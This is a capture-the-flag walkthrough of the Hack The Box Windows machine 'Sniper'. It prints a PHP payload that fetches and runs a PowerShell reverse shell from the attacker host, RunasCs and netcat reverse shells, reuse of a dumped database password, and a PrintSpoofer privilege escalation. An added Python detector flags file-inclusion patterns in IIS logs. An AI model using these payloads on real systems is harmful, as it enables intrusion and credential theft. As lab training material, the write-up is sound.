HTB - Sniper

Machine Info

Sniper is a medium difficulty Windows machine which features a PHP server. The server hosts a file that is found vulnerable to local and remote file inclusion. Command execution is gained on the server in the context of NT AUTHORITY\iUSR via local inclusion of maliciously crafted PHP session files. Exposed database credentials are used to gain access as the user Chris, who has the same password. Enumeration reveals that the administrator is reviewing CHM (Compiled HTML Help) files, which can be used to leak the administrator's NetNTLMv2 hash. This can be captured, cracked and used to get a reverse shell as administrator using a PowerShell credential object.

Enumeration


Scope

IP Address: 10.10.10.151

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Sniper Co.
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T12:18:29
|_  start_date: N/A
|_clock-skew: 7h00m01s
* Open ports: 80,135,139,445
* UDP Open ports: None
* Services: HTTP - RPC - SMB
* Versions:
* Important Notes:

RPC & SMB Enumeration

Nothing found from rpcclient

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

smb anonymous login failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ smbclient -N -L //$ip                       
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ crackmapexec smb $ip -u '' -p '' --shares                                           

SMB         10.10.10.151    445    SNIPER           [-] Sniper\: STATUS_ACCESS_DENIED 
SMB         10.10.10.151    445    SNIPER           [-] Error enumerating shares: Error occurs while reading from remote(104)

HTTP Enumeration

Looking at Wappalyzer

http://10.10.10.151/user/login.php

I registered an account and tried to log in with it, but the site didn't have anything of interest behind the login.

Initial Access


Shell as iusr

Under http://10.10.10.151/blog/ there is a parameter ?lang which includes blog-en.php

When I tried to include a local file such as the hosts file at C:\Windows\System32\drivers\etc\hosts, it returned the file content.

Since this is a Windows machine, I will try to include a file from my SMB server via a UNC path (this side-steps allow_url_include, because PHP on Windows treats \\host\share as a local filesystem path).

Crafting the URL to call our server, we get a hit:

http://10.10.10.151/blog/?lang=\\10.10.16.3\share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49692)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
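From the defender's side, the requests above leave a clear trace in the IIS logs: a language selector whose value is a UNC path, a drive-letter path or a traversal sequence. The following is an added example (not part of the original writeup) that scans constructed IIS-style log lines for exactly that pattern; the log format, field order and sample lines are assumptions, not the box's real logs.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed IIS W3C-style log lines (assumed layout, not real logs):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
2024-07-11 12:20:01 10.10.16.3 GET /blog/ lang=blog-en.php 200
2024-07-11 12:20:05 10.10.16.3 GET /blog/ lang=C:\Windows\System32\drivers\etc\hosts 200
2024-07-11 12:20:09 10.10.16.3 GET /blog/ lang=%5C%5C10.10.16.3%5Cshare%5Cshell.php 200
2024-07-11 12:20:12 10.10.16.3 GET /blog/ lang=..%2F..%2Fuser%2Fdb.php 200
2024-07-11 12:21:00 10.10.14.7 GET /user/login.php - 200
"""

# Shapes a language selector should never take: UNC path to another host,
# absolute Windows drive path, directory traversal, or a stream scheme
# (http://, php://, data://) that would indicate remote/wrapper inclusion.
SUSPICIOUS = [
    ("unc_path",   re.compile(r"^[\\/]{2}[^\\/]+[\\/]")),
    ("drive_path", re.compile(r"^[A-Za-z]:[\\/]")),
    ("traversal",  re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("wrapper",    re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://", re.I)),
]

def decode(value: str) -> str:
    """Decode twice so %255C-style double encoding is normalised as well."""
    return unquote(unquote(value))

def classify(value: str) -> list[str]:
    """Return the names of every suspicious pattern the decoded value matches."""
    decoded = decode(value)
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]

def scan_iis_log(text: str, param: str = "lang") -> list[dict]:
    """Flag requests whose `param` query value looks like a file inclusion attempt."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue  # skip blanks and W3C directive lines
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        date, clock, c_ip, _method, stem, query, _status = fields[:7]
        if query == "-":
            continue  # IIS writes '-' when there is no query string
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reasons = classify(value)
            if reasons:
                hits.append({"time": f"{date} {clock}", "client": c_ip,
                             "uri": stem, "value": decode(value), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```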

I then tried to get RCE by downloading a reverse shell PowerShell script and executing it on the fly.

http://10.10.10.151/blog/?lang=\\10.10.16.3\share\shell.php

shell.php content

<?php system("IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"); ?>

Start an nc listener and include the remote shell:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rlwrap nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell running as user SNIPER$ on SNIPER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\blog>

We land in the web server folder, which may contain database connection strings or login credentials.

PS C:\inetpub\wwwroot> type user\db.php

<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

These are database credentials. I looked at the ports listening locally and found that the MySQL default port 3306 is open.

PS C:\inetpub\wwwroot> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       6752
<snip>

To connect to the database I need a fully interactive shell, so I will forward the MySQL port to my local machine using chisel.

Run Nmap against the forwarded port locally to verify it works:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ nmap -p3306 localhost                                  

PORT     STATE SERVICE
3306/tcp open  mysql

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ mysql -h 127.0.0.1 -u dbuser sniper -p'36mEAhz/B8xQ~2VM'

MySQL [sniper]>
MySQL [sniper]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sniper             |
+--------------------+
2 rows in set (0.391 sec)

MySQL [sniper]> use sniper;
Database changed
MySQL [sniper]> show tables;
+------------------+
| Tables_in_sniper |
+------------------+
| users            |
+------------------+
1 row in set (0.166 sec)

MySQL [sniper]> select * from users;
+----+-----------+------------------+----------------------------------+---------------------+
| id | username  | email            | password                         | trn_date            |
+----+-----------+------------------+----------------------------------+---------------------+
|  1 | superuser | admin@sniper.co  | 6e573c8b25e9168e0c61895d821a3d57 | 2019-04-11 22:45:36 |
|  8 | hacker    | hacker@gmail.com | 6c569aabbf7775ef8fc570e228c16b98 | 2024-07-11 05:31:48 |
+----+-----------+------------------+----------------------------------+---------------------+

Shell as Chris

I found two users: the one I created when registering in the web app, and an admin user. When I tried to crack the admin hash, I failed.

Looking at the users on the system, Chris has a profile. Let's try the dbuser password we found against him instead.

PS C:\inetpub\wwwroot\blog> dir C:\Users\

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2019   6:47 AM                Administrator
d-----        4/11/2019   7:04 AM                Chris
d-r---         4/9/2019   6:47 AM                Public

And we got a hit, but I need a shell as that user, since we don't have any remote access as him.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ crackmapexec smb $ip -u 'Chris' -p '36mEAhz/B8xQ~2VM'

SMB         10.10.10.151    445    SNIPER           [+] Sniper\Chris:36mEAhz/B8xQ~2VM  

So I download RunasCs.exe from my Kali box to the machine.

PS C:\Windows\Temp> curl 10.10.16.3/RunasCs.exe -o .\r.exe

Execute it with Chris's credentials to get a shell as that user:

PS C:\Windows\Temp> .\r.exe Chris '36mEAhz/B8xQ~2VM' powershell.exe -r 10.10.16.3:8443

Start an nc listener and wait for the shell:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rlwrap nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.151] 49738

PS C:\Windows\system32> 

Get the flag

PS C:\Users\Chris> type Desktop\user.txt

44d27619bef1f819476fxxxxxxxxxxxxxxxxx

User Flag: 44d27619bef1f819476fxxxxxxxxxxxxxxxxx


Privilege Escalation

When I ran tree /F to explore the folder contents, I found a file extension I hadn't seen before: .chm


PS C:\Users\Chris> tree /F

Folder PATH listing
Volume serial number is AE98-73A8
C:.
3D Objects
Contacts
Desktop
       user.txt
       
Documents
Downloads
       instructions.chm
<snip>

I searched Google for it and found that it's a Compiled HTML Help file.

I found this useful post: Weaponize .chm files with PowerShell (Nishang) by R3d Buck3T

Personally, I couldn't download the required program from the Microsoft download center, so I will reach Administrator via an unintended path.

Shell as SYSTEM

I found that iusr has SeImpersonatePrivilege, which can be abused to escalate to the SYSTEM account.

PS C:\Windows\Temp> whoami

nt authority\iusr
PS C:\Windows\Temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

I need the PrintSpoofer.exe tool, so I will download it to the box and execute it to get a reverse shell as SYSTEM.

Get the root flag

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
f65247f419e1087df1fxxxxxxxxxxxxx

Root Flag: f65247f419e1087df1fxxxxxxxxxxxxx


Last updated 11 months ago
